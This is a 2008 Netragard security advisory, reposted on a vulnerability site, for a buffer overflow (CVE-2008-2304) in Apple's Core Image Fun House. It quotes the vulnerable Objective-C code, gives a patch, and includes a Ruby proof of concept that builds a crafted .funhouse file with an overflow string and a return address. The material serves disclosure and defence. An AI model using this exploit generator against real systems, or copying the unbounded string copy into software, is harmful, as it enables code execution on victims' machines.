Apple Core Image Fun House <= 2.0 OS X -- Arbitrary Code Execution

2008.07.16
Credit: Netragard Security Advisories (advisories netragard com)
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2008-2304
CWE: CWE-119


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 *************************** NETRAGARD ADVISORY *********************** http://www.netragard.com "We make IT Safe" [Advisory Summary] - ---------------------------------------------------------------------- Advisory Author : Adriel T. Desautels Researcher : Kevin Finisterre Advisory ID : NETRAGARD-20070628 Product Name : Core Image Fun House Product Version : <= 2.0 OS X Vendor Name : http://www.apple.com Type of Vulnerability : Buffer Overflow Effort (1-10 where 1 == easy) : 5 Impact : Arbitrary Code Execution Vendor Notified : Yes Patch Released : N/A Discovery Date : 07/10/2007 [POSTING NOTICE] - ---------------------------------------------------------------------- If you intend to post this advisory on your web-site you must provide a clickable link back to http://www.netragard.com as the contents of this advisory may be updated without notice. [Product Description] - ---------------------------------------------------------------------- "From creating new solutions for print, photography, scientific visualization, and film post-production to enhancing your application's user interface with innovative and effortless visual effects, Core Image performs the heavy lifting that enables the next generation of imaging applications." - -- http://developer.apple.com/macosx/coreimage.html -- [Technical Summary] - ---------------------------------------------------------------------- It is possible to trigger an exploitable buffer overflow condition by creating a specially crafted .funhouse file. [Technical Details] - ---------------------------------------------------------------------- The Funhouse application does not properly parse XML data. Specifically it is possible to create a specially crafted .funhouse file that will trigger and exploit a buffer overflow condition. The code responsible for the condition is as follows: // render origin handles using AppKit directly - - (CIImage *)drawPoints:(CIImage *)im { ... ~ NSString *str, *str2, *localizedParameter; ... ~ else if ([type isEqualToString:@"image"]) ~ { ~ // image effect stack element ~ // show an image origin (in its center) ~ CGRect r = [[es imageAtIndex:i] extent]; ~ NSPoint offset = [es offsetAtIndex:i]; ~ pt.x = offset.x + (r.origin.x + r.size.width * 0.5); ~ pt.y = offset.y + (r.origin.y + r.size.height * 0.5); ~ str = [[es filenameAtIndex:i] stringByAppendingString:@" center"]; ~ [self drawPoint:pt label:str intoContext:cg]; ~ } } The following code is called by the code referenced above: /* ~ Drawing */ // draw an onscreen handle for an image origin, text origin, or filter point // the handle is a "center symbol" - a circle with crosshairs through it. // the handle is labelled with the string "str". // all items are "shadowed" - - (void)drawPoint:(NSPoint)pt label:(NSString *)str intoContext:(CGContextRef)cg { ... ~ char cstr[256]; ... ~ if (!movingNow) ~ { ~ [str getCString:cstr]; <-- Vulnerability Exists Here [Fix] - ---------------------------------------------------------------------- To fix the issue the [str getCString:cstr]; needs to be replaced with [str getCString:cstr maxLength:254]; to prevent overflows. - - [str getCString:cstr]; + [str getCString:cstr maxLength:254]; [Proof Of Concept] - ---------------------------------------------------------------------- #!/usr/bin/ruby # Copyright (c) Netragard, LLC. adriel (at) netragard (dot) com [email concealed] # # /Developer/Applications/Graphics Tools/Core Image Fun House.app # /Contents/MacOS/Core Image Fun House # # (gdb) x/10s 0xbfffddf7 # 0xbfffddf7: 'Z' <repeats 101 times>, "DCBA center" # # 2007-07-10 21:15:34.573 Core Image Fun House[1061] CFLog (0): # CFPropertyListCreateFromXMLData(): plist parse failed; # the data is notproper UTF-8. The file name for this data # could be: $ # /Users/test/Desktop/SuperTastey.funhouse/file.xml # The parser will retry as in 10.2, but the problem should be # corrected in the plist. # # \x80-\xFF range that do not form proper utf8 len = 300 fname = "SuperTastey" retaddr = 0x0d0d0d0d # There are lots of filtered chars! if File.exist?(fname + ".funhouse/file.xml") File.unlink(fname + ".funhouse/file.xml") Dir.rmdir(fname + ".funhouse") end Dir.mkdir(fname + ".funhouse") FUNSTUFF = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>" + "<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">" + "<plist version=\"1.0\">" + "<dict>" + "<key>layers</key>" + "<array>" + "<dict>" + "<key>file</key>" + "<string>" + "Z" * len + [retaddr].pack("V") + "</string>" + "<key>offsetX</key>" + "<real>0.0</real>" + "<key>offsetY</key>" + "<real>0.0</real>" + "<key>type</key>" + "<string>image</string>" + "</dict>" + "<dict>" + "<key>classname</key>" + "<string>CIGlassDistortion</string>" + "<key>type</key>" + "<string>filter</string>" + "<key>values</key>" + "<dict>" + "<key>inputCenter_CIVectorValue</key>" + "<string>[150 150]</string>" + "<key>inputScale</key>" + "<real>200</real>" + "<key>inputTexture</key>" + "<string>" + "Z" * 50000 + "</string>" + "</dict>" + "</dict>" + "</array>" + "</dict>" + "</plist>" + "\n" target_file = File.open("SuperTastey.funhouse/file.xml", "w+") { |f| ~ f.print(FUNSTUFF) # weeeeee... lets have fun. ~ f.close } [Vendor Status] - ---------------------------------------------------------------------- Vendor Notified [Vendor Comments] - ---------------------------------------------------------------------- This issue is addressed in Xcode tools 3.1. Credit to Kevin Finisterre of Netragard for reporting this issue to Apple. Further information is available at: http://support.apple.com/kb/HT1222 [Disclaimer] - ----------------------http://www.netragard.com------------------------ Netragard, L.L.C. assumes no liability for the use of the information provided in this advisory. This advisory was released in an effort to help the I.T. community protect themselves against a potentially dangerous security hole. This advisory is not an attempt to solicit business. <a href="http://www.netragard.com> http://www.netragard.com </a> [Netragard Whitepaper Downloads] - ---------------------------------------------------------------------- Choosing the right provider : http://tinyurl.com/2ahk3j Three Things you must know : http://tinyurl.com/26pjsn -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (Darwin) iD8DBQFId6ijQwbn1P9Iaa0RAoLpAJ94J7P/GGI+fr4P3UlORkG7v6xWEwCePG6n Tk3RLUnGHHdl6WHLzaoY07U= =MJZy -----END PGP SIGNATURE-----

References:

http://www.securityfocus.com/archive/1/archive/1/494230/100/0/threaded
http://www.milw0rm.com/exploits/6043
http://support.apple.com/kb/HT2352


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top